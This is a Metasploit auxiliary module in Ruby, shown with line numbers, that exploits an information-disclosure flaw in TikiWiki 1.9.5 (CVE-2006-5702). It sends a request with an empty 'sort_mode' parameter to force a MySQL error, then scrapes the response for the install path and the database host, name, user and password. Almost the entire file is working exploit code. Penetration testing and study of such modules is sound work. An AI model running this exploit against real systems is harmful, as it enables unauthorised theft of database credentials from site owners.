1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'TikiWiki Information Disclosure',
14
        'Description' => %q{
15
          A vulnerability has been reported in Tikiwiki, which can be exploited by
16
          an anonymous user to dump the MySQL user & passwd just by creating a mysql
17
          error with the "sort_mode" var.
18

19
          The vulnerability was reported in Tikiwiki version 1.9.5.
20
        },
21
        'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
22
        'License' => MSF_LICENSE,
23
        'References' => [
24
          ['OSVDB', '30172'],
25
          ['BID', '20858'],
26
          ['CVE', '2006-5702'],
27
          ['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],
28
        ],
29
        'DisclosureDate' => '2006-11-01',
30
        'Actions' => [
31
          ['Dump', { 'Description' => 'Dump user and password' }]
32
        ],
33
        'DefaultAction' => 'Dump',
34
        'Notes' => {
35
          'Stability' => [CRASH_SAFE],
36
          'SideEffects' => [],
37
          'Reliability' => []
38
        }
39
      )
40
    )
41

42
    register_options(
43
      [
44
        OptString.new('URI', [true, 'TikiWiki directory path', '/tikiwiki']),
45
      ]
46
    )
47
  end
48

49
  def run
50
    print_status('Establishing a connection to the target...')
51

52
    uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
53
    rpath = uri + '?days=1&offset=0&sort_mode='
54

55
    res = send_request_raw({
56
      'uri' => rpath,
57
      'method' => 'GET',
58
      'headers' =>
59
      {
60
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
61
        'Connection' => 'Close'
62
      }
63
    }, 25)
64

65
    if res && (res.message == 'OK')
66
      print_status('Get information about database...')
67

68
      n = 0
69
      c = 0
70

71
      # puts "body is #{res.body.length} bytes"
72
      infos = res.body.split(/\r?\n/)
73
      infos.each do |row|
74
        # puts row.inspect
75
        next unless (c < 6)
76

77
        if row.match(/\["file"\]=>/)
78
          c += 1
79
          x = n + 1
80
          y = infos[x].match(/string\(\d+\) "(.*)"/m)
81
          print_status("Install path : #{y[1]}")
82
        end
83
        if row.match(/\["databaseType"\]=>/)
84
          c += 1
85
          x = n + 1
86
          y = infos[x].match(/string\(\d+\) "(.*)"/m)
87
          print_status("DB type      : #{y[1]}")
88
        end
89
        if row.match(/\["database"\]=>/)
90
          c += 1
91
          x = n + 1
92
          y = infos[x].match(/string\(\d+\) "(.*)"/m)
93
          print_status("DB name      : #{y[1]}")
94
        end
95
        if row.match(/\["host"\]=>/)
96
          c += 1
97
          x = n + 1
98
          y = infos[x].match(/string\(\d+\) "(.*)"/m)
99
          print_status("DB host      : #{y[1]}")
100
        end
101
        if row.match(/\["user"\]=>/)
102
          c += 1
103
          x = n + 1
104
          y = infos[x].match(/string\(\d+\) "(.*)"/m)
105
          print_status("DB user      : #{y[1]}")
106
        end
107
        if row.match(/\["password"\]=>/)
108
          c += 1
109
          x = n + 1
110
          y = infos[x].match(/string\(\d+\) "(.*)"/m)
111
          print_status("DB password  : #{y[1]}")
112
        end
113
        n += 1
114
      end
115

116
      if (c == 0)
117
        print_status('Could not obtain information about database.')
118
      end
119

120
    else
121
      print_status('No response from the server.')
122
    end
123
  end
124
end
125

126